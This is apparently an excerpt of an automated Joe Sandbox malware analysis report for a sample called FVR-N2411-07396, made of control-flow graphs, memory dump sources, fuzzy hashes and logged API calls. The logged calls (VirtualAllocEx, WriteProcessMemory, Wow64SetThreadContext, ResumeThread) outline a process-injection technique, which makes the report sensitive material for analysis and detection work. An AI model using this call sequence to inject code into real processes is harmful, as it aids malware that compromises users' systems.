                                      control_flow_graph 755 2845a84-2845a90 756 2845a42-2845a47 755->756 757 2845a92-2845b14 755->757 760 2845a4b-2845a4f 756->760 761 2845a60-2845a61 760->761 762 2845a51-2845a5d 760->762 761->755 762->761
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2053072488.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2840000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a1493977388cf241fdd24581905e6deee974d885d8dee3ef8efde27723482da8
                                      • Instruction ID: eae01ac61dae8bb796b2cb13e8f50e647c796e84fe4a926e5d1fba87c46d6622
                                      • Opcode Fuzzy Hash: a1493977388cf241fdd24581905e6deee974d885d8dee3ef8efde27723482da8
                                      • Instruction Fuzzy Hash: 0C31BCB880464DCFEB11DFA8C85479DBBF1EF56308F94418AC405AB2A5CB79A94ACB01

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 765 7207870-7207874 766 72078b2-72078c6 765->766 767 7207876-72078b1 765->767 771 72078d6-7207915 WriteProcessMemory 766->771 772 72078c8-72078d4 766->772 767->766 774 7207917-720791d 771->774 775 720791e-720794e 771->775 772->771 774->775
                                      APIs
                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07207908
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: 4f9e1b2a372f1a48b69f4641f362c0f9bc970f5d5dc0c0ae9f42da64efa1ea10
                                      • Instruction ID: d681481922de5e001f72bc33f050d65a522dab7b5b6dfce2c965bcb862b3bcfe
                                      • Opcode Fuzzy Hash: 4f9e1b2a372f1a48b69f4641f362c0f9bc970f5d5dc0c0ae9f42da64efa1ea10
                                      • Instruction Fuzzy Hash: 973138B590020D9FCB10DFAAC845AEEBBF5FF48320F108429E959A7291D7789544DBA0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 779 7207878-72078c6 783 72078d6-7207915 WriteProcessMemory 779->783 784 72078c8-72078d4 779->784 786 7207917-720791d 783->786 787 720791e-720794e 783->787 784->783 786->787
                                      APIs
                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07207908
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: 877456dfe9c391dc66cc7b299d1fc7e0b8a257857d0760ac00fd3cb3f5c44620
                                      • Instruction ID: 1e258ef445c4b230f828771ad74108f76876080951bf86817e306ccb6682ef15
                                      • Opcode Fuzzy Hash: 877456dfe9c391dc66cc7b299d1fc7e0b8a257857d0760ac00fd3cb3f5c44620
                                      • Instruction Fuzzy Hash: CF2126B190034D9FCB10DFAAC985BEEBBF5FF48310F108429E919A7251D778A944CBA4
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0720775E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: 6a72db16658a82b4527dc94bcd9b69cb335c16e05c74833b6656f2045de750e9
                                      • Instruction ID: 1c099263761268329318dc97bba6122b356978bc9485d05210a2478e0266557c
                                      • Opcode Fuzzy Hash: 6a72db16658a82b4527dc94bcd9b69cb335c16e05c74833b6656f2045de750e9
                                      • Instruction Fuzzy Hash: 2C215CB59003498FDB10DFAAC4857EEBBF4EF48364F108429D459A7341D778A584CFA1
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0284D6D6,?,?,?,?,?), ref: 0284D797
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2053072488.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2840000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 2655791100f26d014f3f909f7e6e1e1431b37fcb999d6d6542fef718ba4997c9
                                      • Instruction ID: 4b95bd8650c830657767692876479924f3f95f27372b707210ee064867e8c2df
                                      • Opcode Fuzzy Hash: 2655791100f26d014f3f909f7e6e1e1431b37fcb999d6d6542fef718ba4997c9
                                      • Instruction Fuzzy Hash: ED21E6B590024C9FDB10CF9AD584ADEFBF8FB48314F14845AE918A3310D778A954CFA4
                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072079E8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: 523a3001835ea64c6e90cd0992d0a5aec9e99df1c189a7d8318d58ee26fa5c1a
                                      • Instruction ID: b3e5f582eae410100a48c96c4071be1ec23779b527fa4055305d117eee7d0d7b
                                      • Opcode Fuzzy Hash: 523a3001835ea64c6e90cd0992d0a5aec9e99df1c189a7d8318d58ee26fa5c1a
                                      • Instruction Fuzzy Hash: 022128B1C00249DFDB10DFAAC985AEEBBF5FF48320F108429E559A7250D7389544CBA4
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0284D6D6,?,?,?,?,?), ref: 0284D797
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2053072488.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2840000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 023bf813792a58914ca7dc5e4322394ada5be8f23a50eeede2bc38108ff1d0dd
                                      • Instruction ID: 2aa812ceb613eba2764029ed858eb2d35a019d6c31e0d8723959d8249471f0fc
                                      • Opcode Fuzzy Hash: 023bf813792a58914ca7dc5e4322394ada5be8f23a50eeede2bc38108ff1d0dd
                                      • Instruction Fuzzy Hash: 3921E4B59002499FDB10CFAAD584AEEBFF4FB48324F14845AE918A3311D378A944CFA5
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0720775E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: 83d7889780b2776c003e520cffc6effe9fce8dc0dfb4e7946fc52f70cf6004fa
                                      • Instruction ID: 0970a9a486e4cc5bdc98184437ba006bad53d7940c1d8e1f17063c646bcb8eaa
                                      • Opcode Fuzzy Hash: 83d7889780b2776c003e520cffc6effe9fce8dc0dfb4e7946fc52f70cf6004fa
                                      • Instruction Fuzzy Hash: DC2135B19003098FDB10DFAAC485BAEBBF4EF48324F10842AD419A7351DB78A944CFA4
                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072079E8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: 12d346995bace78c7e6cd153339875968b7f76795b81b9f3eaa69bc54f61080b
                                      • Instruction ID: b403c63b6ae299aff504816d344ed819fabe885d8e18948fdcd64a3295544f3a
                                      • Opcode Fuzzy Hash: 12d346995bace78c7e6cd153339875968b7f76795b81b9f3eaa69bc54f61080b
                                      • Instruction Fuzzy Hash: CB2109B1C003599FDB10DFAAC945AEEFBF5FF48310F508429E519A7250D778A544CBA4
                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07207826
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 50d9f7042de639935630728adca780d45aa785366fb7dd36dd33fc6fe0085a0e
                                      • Instruction ID: 489f3118e46fdb39cde2a1d61518df7245fb4de575346bcabec283f7285f9b03
                                      • Opcode Fuzzy Hash: 50d9f7042de639935630728adca780d45aa785366fb7dd36dd33fc6fe0085a0e
                                      • Instruction Fuzzy Hash: 961129B19002499FCF10DFAAD845AEFBFF5EF48320F208419E519A7250CB79A944CFA5
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: c48ec00b3bab24e3a53ef0c042fda05fc144d2e19e311a6c2f057fef4a65e39e
                                      • Instruction ID: 4e8ff2ba4f6d6fe3bea329fce551a81f7353b51f96ea7e6d6dbd7abb0ffb868f
                                      • Opcode Fuzzy Hash: c48ec00b3bab24e3a53ef0c042fda05fc144d2e19e311a6c2f057fef4a65e39e
                                      • Instruction Fuzzy Hash: C61149B58003498FCB10DFAAD4457EEFBF5EF48324F108819D41AA7250DB39A584CBA4
                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07207826
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: d4d2c349fadd50e70266f3e08b9274062f8756bb324014fa16d0de5ad1be2387
                                      • Instruction ID: 856419dc314ba5fb5b7b04e34f8587c0355d72247385ab01dc5029672f2eaf5e
                                      • Opcode Fuzzy Hash: d4d2c349fadd50e70266f3e08b9274062f8756bb324014fa16d0de5ad1be2387
                                      • Instruction Fuzzy Hash: 411137B18002499FCF10DFAAD844AEFBFF5EF48320F108819E519A7250C779A944CFA0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 91dc219268c26ff8cd91d13bf23c30a71ded124f6f8e485987c18135dcd53bc3
                                      • Instruction ID: 183efef51079bb7be74ef873ee1913d80154fd09c956ac7bc42774775c0e19b7
                                      • Opcode Fuzzy Hash: 91dc219268c26ff8cd91d13bf23c30a71ded124f6f8e485987c18135dcd53bc3
                                      • Instruction Fuzzy Hash: 2E1128B19002498FDB14DFAAC4457AFFBF9EF88324F108419D519A7240CB79A544CBA4
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0720B9AD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID:
                                      • API String ID: 410705778-0
                                      • Opcode ID: 1fc360fc8b63f2a64b081960b0272b961a5cc7625e52d4bb1dd03ad97fd1a08b
                                      • Instruction ID: 9e59ee077ac9ed9da303d78d24b103c10f47202ad712da8421d0d14240ba0312
                                      • Opcode Fuzzy Hash: 1fc360fc8b63f2a64b081960b0272b961a5cc7625e52d4bb1dd03ad97fd1a08b
                                      • Instruction Fuzzy Hash: 0F11F2B58002499FDB20DF9AD845BDEBFF8EB48320F10841AE518A7640C379A984CFA5
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0284B07E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2053072488.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2840000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: c5ae2f32a497548a35d9881ac993c968206cb75f69785c00f365759927bf9ada
                                      • Instruction ID: 7a438f53b448087c515cd8a4e292c1f8f33ce9dff7ce345a33918823e0ef3f6f
                                      • Opcode Fuzzy Hash: c5ae2f32a497548a35d9881ac993c968206cb75f69785c00f365759927bf9ada
                                      • Instruction Fuzzy Hash: B211D2B9C002498FDB10DF9AD444A9EFBF4EB48718F10845AD529A7210D379A545CFA5
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0720B9AD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID:
                                      • API String ID: 410705778-0
                                      • Opcode ID: 1dc4eccd8e794dc5f1d874bbff1d3fc6ec54b0b8c18057b941293353cb774457
                                      • Instruction ID: a0b77fec0388f15b3713453dd385d93954fd9cef2e8b2dd3e030b4423823559d
                                      • Opcode Fuzzy Hash: 1dc4eccd8e794dc5f1d874bbff1d3fc6ec54b0b8c18057b941293353cb774457
                                      • Instruction Fuzzy Hash: A411F2B581034D9FDB20DF9AD844BDEBBF8EB49320F108459E518A7241C379AA44CFE5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2052152556.00000000027AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027AD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_27ad000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f0c071fd91e7f8cab1324e7f757f69f62b37c3f55d0932696a37deacbe39ae7f
                                      • Instruction ID: b0f4ce63d01749d2a6903653c694749bda7b02a1f76344fde9db1d474a7f6b55
                                      • Opcode Fuzzy Hash: f0c071fd91e7f8cab1324e7f757f69f62b37c3f55d0932696a37deacbe39ae7f
                                      • Instruction Fuzzy Hash: 3A2103B1500204DFDB29DF54D9D0F26BF65FBD8324F20C669ED0A0B656C33AE456CAA2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2052197856.00000000027BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027BD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_27bd000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8e73e3d1abff68971e33b2e35f76e9f03c89ed8fa4b7f67e92d514b09a63973f
                                      • Instruction ID: 48631d94ea2de5f5c2e04c2bb19f781142b3a0cb0c778680bdc2eca8f87aa5b5
                                      • Opcode Fuzzy Hash: 8e73e3d1abff68971e33b2e35f76e9f03c89ed8fa4b7f67e92d514b09a63973f
                                      • Instruction Fuzzy Hash: 5921F275604204DFDB26DF24D9C4B66BF65FF88314F24C569E90A4B256C33AD407CA61
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2052197856.00000000027BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027BD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_27bd000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 117e1fb6aea842e87d1801450bf5d3a91910c4ce0cf6a6dfb2ab28a494263ec8
                                      • Instruction ID: f804eec73834bbdec9f72609d1245318391df9c2ba58977d60ffe118d8f130be
                                      • Opcode Fuzzy Hash: 117e1fb6aea842e87d1801450bf5d3a91910c4ce0cf6a6dfb2ab28a494263ec8
                                      • Instruction Fuzzy Hash: E721F271904284EFDB26DF64D9C4BA6BBA5FF88314F20C56DE9094B256C33AD806CB61
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2052197856.00000000027BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027BD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_27bd000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cf8dae75349ada00d977c492a2fe1bd4629512b1018676f82883c98f02189735
                                      • Instruction ID: 43920338b23d68f5c9438431baea3886acffb6f7e1b2afc2c208c06951029222
                                      • Opcode Fuzzy Hash: cf8dae75349ada00d977c492a2fe1bd4629512b1018676f82883c98f02189735
                                      • Instruction Fuzzy Hash: E3215E755093808FDB13CF24D994755BF71EF46214F28C5DAD8898B6A7C33A980ACB62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2052152556.00000000027AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027AD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_27ad000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                      • Instruction ID: 31ff7a1f5064d281fed1d674092c087e94645b32290c9f731bdacc280a856721
                                      • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                      • Instruction Fuzzy Hash: 3D110376404240CFDB16CF00D5C4B16BF72FB84324F24C6A9DD090B656C33AE45ACBA2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2052197856.00000000027BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027BD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_27bd000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                      • Instruction ID: 5cd8154569b038d794945277de719eca34c4099aa3092c6a7475e407d8072b41
                                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                      • Instruction Fuzzy Hash: 1A118B75904280DFDB16CF14D5C4B56BFA1FF84224F24C6A9D8494B696C33AD44ACB62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2052152556.00000000027AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027AD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_27ad000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1be0577753705068affa0d3d45819ee1508d42282d1b21d8b7f9a8cb4a0a224c
                                      • Instruction ID: 2c73332c4e5b01974fb6fbcfb3ba52dc9f8b7557eaa25a1fcc7a61c381155f6d
                                      • Opcode Fuzzy Hash: 1be0577753705068affa0d3d45819ee1508d42282d1b21d8b7f9a8cb4a0a224c
                                      • Instruction Fuzzy Hash: F60126710043459AE7348F2ACD94B67BF9CEFC6334F18C66AED091A696C37D9840CAB5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2052152556.00000000027AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027AD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_27ad000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8848e509b9c00a9290348cbdccb946e853f3dd0acd4d2c02da039d9d6c27f0b8
                                      • Instruction ID: 66677809f4e5f00b743b9a58045cd947e0892cd7127eb84b8465b880f1b60d33
                                      • Opcode Fuzzy Hash: 8848e509b9c00a9290348cbdccb946e853f3dd0acd4d2c02da039d9d6c27f0b8
                                      • Instruction Fuzzy Hash: 1DF0F071004344AEE7248F1ACC88B62FFACEF82334F18C55AED080B296C3799844CBB4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069457895.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4fb0000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b8f57f3a18d2f9a65fccd24aaa7b0765a29b787c78301e1cc61c2ceee560be8f
                                      • Instruction ID: 6a3a79d3780ef2d355dbb85cd5d42e6054e0d00aa147bf62e8b912111adc6b3d
                                      • Opcode Fuzzy Hash: b8f57f3a18d2f9a65fccd24aaa7b0765a29b787c78301e1cc61c2ceee560be8f
                                      • Instruction Fuzzy Hash: CB1295B041A74AEAE710CF65F94C1897AB1F7C5318B90A20AD2616E2E5D7FC1DCACF44
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 912708a477bc4be8744661fad75c6e4155d311cc5376da392b1330e286f9e5fd
                                      • Instruction ID: 10f4726a13740f21c75f87fe5963bd596840da8b137ac1e91c28a86f48b002ab
                                      • Opcode Fuzzy Hash: 912708a477bc4be8744661fad75c6e4155d311cc5376da392b1330e286f9e5fd
                                      • Instruction Fuzzy Hash: 57E12BB4E142198FCB14DFA8C580AAEFBF6FF89305F248169D404AB356D731A941CFA1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 22d2e1040b58b4677be789732cee0389a79142a480f74ad35ac0e3654070e16a
                                      • Instruction ID: 5f0ab6419c0023ff36f372d0d57e1b2be4300f81b3cba207e2a54390be219113
                                      • Opcode Fuzzy Hash: 22d2e1040b58b4677be789732cee0389a79142a480f74ad35ac0e3654070e16a
                                      • Instruction Fuzzy Hash: C4E12AB4E102598FCB14DFA9C580AAEFBF2FF89301F248169D414AB356D730A941CFA1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38b582189cc0d8a0893e62491a1bd69391a4860eb9583a1a5c43079100d1e5f3
                                      • Instruction ID: db6dd5fbd97e1229a5749e06e44a9e794186d01f24788091da679de3f4d145f5
                                      • Opcode Fuzzy Hash: 38b582189cc0d8a0893e62491a1bd69391a4860eb9583a1a5c43079100d1e5f3
                                      • Instruction Fuzzy Hash: 7CE11CB4E102198FCB14DFA9C5809AEFBF6FF89305F248169D414AB356D731A981CFA1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c6a5164b7934ca9b02da260b40703a1a173246d1a069b0dd73595c7d13ffc81f
                                      • Instruction ID: e88844eebe971e4a51e11d066a249a72e33aac1a6ee369caf0812e34164eec2d
                                      • Opcode Fuzzy Hash: c6a5164b7934ca9b02da260b40703a1a173246d1a069b0dd73595c7d13ffc81f
                                      • Instruction Fuzzy Hash: 0DE11BB4E102598FCB14DFA9C5809AEFBF6FF89305F248169D414AB356D730A981CFA1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dbc8ccd84349a7c49ce08d1204c902b162c025fed3033844deb1bee85ea4ba31
                                      • Instruction ID: a4e70855b3f6f79c772ab655b4524e70c0f437b8eb5127b78885b8f4d209194c
                                      • Opcode Fuzzy Hash: dbc8ccd84349a7c49ce08d1204c902b162c025fed3033844deb1bee85ea4ba31
                                      • Instruction Fuzzy Hash: 75E11CB4E102598FCB14DFA8C5809AEFBF6FF89305F248169D414AB356D731A981CFA1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2053072488.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2840000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9573b2f6c05f565c004bf623765be2fdb56907afb4c53ac3b6e58c28278a0aa1
                                      • Instruction ID: 14125d7a4eac8fccc71d8e5dcfd3a51b3485abc4da9bfddaa406b811257d1bb0
                                      • Opcode Fuzzy Hash: 9573b2f6c05f565c004bf623765be2fdb56907afb4c53ac3b6e58c28278a0aa1
                                      • Instruction Fuzzy Hash: A8A15C3AA002198FCF05DFA8D44499EB7B2FF95304B25816EE905EB261DF35E955CF80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069457895.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4fb0000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f15c4e9a4240a40f3817d73281743643c88dc35fab6c4b37df23a361a1737cc5
                                      • Instruction ID: 994af0c68ca025f177009c824b4031197e0899de32bbe50ee92610318f58deb3
                                      • Opcode Fuzzy Hash: f15c4e9a4240a40f3817d73281743643c88dc35fab6c4b37df23a361a1737cc5
                                      • Instruction Fuzzy Hash: 74C1D4B081674AAAD714CF65F94C1897BB1FBC5324B50A20AD1616F2E5DBFC18CACF44
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 809c3c2445768e2712cb9357ba0146a5ed14ac4246e05b75e6c593271f8776bc
                                      • Instruction ID: 0c211948309dd110002c64f7abca80db83af6ce2637facc7872d08e06f152f36
                                      • Opcode Fuzzy Hash: 809c3c2445768e2712cb9357ba0146a5ed14ac4246e05b75e6c593271f8776bc
                                      • Instruction Fuzzy Hash: F0513BB4E1021A8FCB14CFA9C5805AEFBF6FF89301F248169D408AB356D7309942CFA1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
